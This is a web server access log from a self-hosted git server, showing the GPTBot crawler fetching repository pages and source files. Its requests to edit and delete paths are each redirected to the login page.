"https://git.hanmocnn.co.kr/windpacer/dbserver/_new/main/OpcUaMinimal/global.json" +[17/Feb/2026:17:14:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?labels=0&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 9983] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?labels=0&state=all&type=all" +[17/Feb/2026:17:14:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?labels=0&milestone=-1&state=all&type=all" [Client 74.7.227.38] [Length 10148] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?milestone=-1&state=all&type=all" +[17/Feb/2026:17:14:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?milestone=-1&project=-1&state=all&type=all" [Client 74.7.227.38] [Length 10147] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?milestone=-1&state=all&type=all" +[17/Feb/2026:17:14:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&milestone=-1&state=all&type=all" [Client 74.7.227.38] [Length 10146] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?milestone=-1&state=all&type=all" +[17/Feb/2026:17:14:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?labels=0&milestone=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10184] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?labels=0&milestone=-1&state=all&type=all" +[17/Feb/2026:17:14:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/PostgresPatrol.spec?display=source" [Client 74.7.227.38] [Length 12301] [Gzip 3.65] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/PostgresPatrol.spec" +[17/Feb/2026:17:14:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?milestone=-1&state=all&type=all" [Client 74.7.227.38] [Length 9948] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?labels=0&milestone=-1&state=all&type=all" +[17/Feb/2026:17:14:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c?files=PostgresPatrol" [Client 74.7.227.38] [Length 196533] [Gzip 14.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol" +[17/Feb/2026:17:14:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e?files=PostgresWatchdog" [Client 74.7.227.38] [Length 35430] [Gzip 7.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog" +[17/Feb/2026:17:14:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6?files=PostgresMonitor" [Client 74.7.227.38] [Length 56772] [Gzip 12.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor" +[17/Feb/2026:17:14:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/app/calculator.py?display=rendered" [Client 74.7.227.38] [Length 11183] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/app/calculator.py" +[17/Feb/2026:17:14:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/app/calculator.py?display=source" [Client 74.7.227.38] [Length 13324] [Gzip 4.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/app/calculator.py" +[17/Feb/2026:17:14:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/app/database.py?display=rendered" [Client 74.7.227.38] [Length 11184] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/app/database.py" +[17/Feb/2026:17:14:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/metadata.json?display=rendered" [Client 74.7.227.38] [Length 10909] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/metadata.json" +[17/Feb/2026:17:14:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/tsconfig.json?display=rendered" [Client 74.7.227.38] [Length 10908] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/tsconfig.json" +[17/Feb/2026:17:14:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_V4.8.py" [Client 74.7.227.38] [Length 18219] [Gzip 5.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor" +[17/Feb/2026:17:14:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_V5.3.py" [Client 74.7.227.38] [Length 21566] [Gzip 7.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor" +[17/Feb/2026:17:14:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&milestone=-1&state=all&type=all" [Client 74.7.227.38] [Length 9960] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?milestone=-1&state=all&type=all" +[17/Feb/2026:17:14:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?milestone=-1&project=-1&state=all&type=all" [Client 74.7.227.38] [Length 9949] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?milestone=-1&state=all&type=all" +[17/Feb/2026:17:14:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_v4.7.spec" [Client 74.7.227.38] [Length 12560] [Gzip 3.69] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor" +[17/Feb/2026:17:14:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_V5.2.spec" [Client 74.7.227.38] [Length 12600] [Gzip 3.71] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor" +[17/Feb/2026:17:14:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_v4.9.spec" [Client 74.7.227.38] [Length 12560] [Gzip 3.69] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor" +[17/Feb/2026:17:14:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_v3.8.spec" [Client 74.7.227.38] [Length 12757] [Gzip 3.78] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor" +[17/Feb/2026:17:14:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_v5.1.spec" [Client 74.7.227.38] [Length 12605] [Gzip 3.71] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor" +[17/Feb/2026:17:14:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_v4.8.spec" [Client 74.7.227.38] [Length 12560] [Gzip 3.69] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor" +[17/Feb/2026:17:14:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_V5.2.py" [Client 74.7.227.38] [Length 20986] [Gzip 6.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor" +[17/Feb/2026:17:14:57 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldMonitor/GoldMonitor_V4.8.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_V4.8.py" +[17/Feb/2026:17:14:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldMonitor/GoldMonitor_V4.8.py" +[17/Feb/2026:17:14:58 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldMonitor/GoldMonitor_V5.3.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_V5.3.py" +[17/Feb/2026:17:14:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldMonitor/GoldMonitor_V5.3.py" +[17/Feb/2026:17:14:58 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldMonitor/GoldMonitor_V4.8.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_V4.8.py" +[17/Feb/2026:17:14:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldMonitor/GoldMonitor_V4.8.py" +[17/Feb/2026:17:14:59 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldMonitor/GoldMonitor_V5.3.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_V5.3.py" +[17/Feb/2026:17:14:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldMonitor/GoldMonitor_V5.3.py" +[17/Feb/2026:17:14:59 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldMonitor/GoldMonitor_v4.7.spec" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_v4.7.spec" +[17/Feb/2026:17:14:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldMonitor/GoldMonitor_v4.7.spec" +[17/Feb/2026:17:15:00 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldMonitor/GoldMonitor_V5.2.spec" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_V5.2.spec" +[17/Feb/2026:17:15:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldMonitor/GoldMonitor_V5.2.spec" +[17/Feb/2026:17:15:00 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldMonitor/GoldMonitor_v4.9.spec" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_v4.9.spec" +[17/Feb/2026:17:15:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldMonitor/GoldMonitor_v4.9.spec" +[17/Feb/2026:17:15:01 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldMonitor/GoldMonitor_v3.8.spec" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_v3.8.spec" +[17/Feb/2026:17:15:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldMonitor/GoldMonitor_v3.8.spec" +[17/Feb/2026:17:15:01 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldMonitor/GoldMonitor_v3.8.spec" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_v3.8.spec" +[17/Feb/2026:17:15:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldMonitor/GoldMonitor_v3.8.spec" +[17/Feb/2026:17:15:02 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldMonitor/GoldMonitor_v4.8.spec" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_v4.8.spec" +[17/Feb/2026:17:15:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldMonitor/GoldMonitor_v4.8.spec" +[17/Feb/2026:17:15:02 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldMonitor/GoldMonitor_V5.2.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_V5.2.py" +[17/Feb/2026:17:15:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldMonitor/GoldMonitor_V5.2.py" +[17/Feb/2026:17:15:03 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldMonitor/GoldMonitor_v5.1.spec" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_v5.1.spec" +[17/Feb/2026:17:15:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldMonitor/GoldMonitor_v5.1.spec" +[17/Feb/2026:17:15:03 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldMonitor/GoldMonitor_v4.8.spec" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_v4.8.spec" +[17/Feb/2026:17:15:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldMonitor/GoldMonitor_v4.8.spec" +[17/Feb/2026:17:15:04 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldMonitor/GoldMonitor_v5.1.spec" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_v5.1.spec" +[17/Feb/2026:17:15:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldMonitor/GoldMonitor_v5.1.spec" +[17/Feb/2026:17:15:04 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldMonitor/GoldMonitor_V5.2.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_V5.2.py" +[17/Feb/2026:17:15:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldMonitor/GoldMonitor_V5.2.py" +[17/Feb/2026:17:15:05 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldMonitor/GoldMonitor_v4.7.spec" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_v4.7.spec" +[17/Feb/2026:17:15:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldMonitor/GoldMonitor_v4.7.spec" +[17/Feb/2026:17:15:06 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldMonitor/GoldMonitor_v4.9.spec" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_v4.9.spec" +[17/Feb/2026:17:15:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldMonitor/GoldMonitor_v4.9.spec" +[17/Feb/2026:17:15:06 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldMonitor/GoldMonitor_V5.2.spec" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_V5.2.spec" +[17/Feb/2026:17:15:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldMonitor/GoldMonitor_V5.2.spec" +[17/Feb/2026:17:15:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldMonitor/GoldMonitor_v5.1.spec" [Client 74.7.227.38] [Length 818] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_v5.1.spec" 